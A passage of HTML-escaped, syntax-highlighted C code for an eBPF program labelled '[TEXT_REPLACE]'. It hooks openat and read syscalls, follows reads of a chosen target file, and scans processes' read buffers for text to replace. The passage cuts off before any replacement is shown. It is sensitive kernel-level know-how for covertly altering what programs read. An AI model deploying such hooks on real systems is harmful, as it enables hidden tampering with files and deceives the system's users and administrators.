    &lt;span class="c1"&gt;// Set the map value to be the returned file descriptor&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_enter_read"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_read_enter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_enter&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this read call comes from a thread that opened our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pfd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_fds&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pfd&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Check this is the correct file descriptor&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;map_fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pfd&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_fd&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Store buffer address from arguments in map&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="c1"&gt;// log and exit&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;buff_size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;size_t&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | fd %d | buff_size %lu&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buff_size&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_read"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;find_possible_addrs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this read call is reading our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pbuff_addr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buff_addr&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// This is the amount of data returned from the read syscall&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;buff_size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;read_size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;buff_size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;read_size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="c1"&gt;// 64 may be too large for the loop&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;local_buff&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="mh"&gt;0x00&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;read_size&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// Need to loop :-(&lt;/span&gt;
        &lt;span class="n"&gt;read_size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Read the data returned in chunks, and note every instance&lt;/span&gt;
    &lt;span class="c1"&gt;// of the first character of our 'to find' text.&lt;/span&gt;
    &lt;span class="c1"&gt;// This is all very convoluted, but is required to keep&lt;/span&gt;
    &lt;span class="c1"&gt;// the program complexity and size low enough to pass the verifier checks&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tofind_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;loop_size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// Read in chunks from buffer&lt;/span&gt;
        &lt;span class="n"&gt;bpf_probe_read_user&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;local_buff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;read_size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// Look for the first char of our 'to find' text&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;local_buff&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;text_find&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="c1"&gt;// This is possibly our text, add the address to the map to be&lt;/span&gt;
                &lt;span class="c1"&gt;// checked by program 'check_possible_addresses'&lt;/span&gt;
                &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_name_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tofind_counter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="n"&gt;tofind_counter&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;buff_addr&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Tail-call into 'check_possible_addresses' to loop over possible addresses&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | tofind_counter %d &lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tofind_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;bpf_tail_call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_prog_array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PROG_01&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_read"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;check_possible_addresses&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this read call is reading our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;newline_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;match_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;text_len_max&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;old&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;name_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;text_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name_len&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
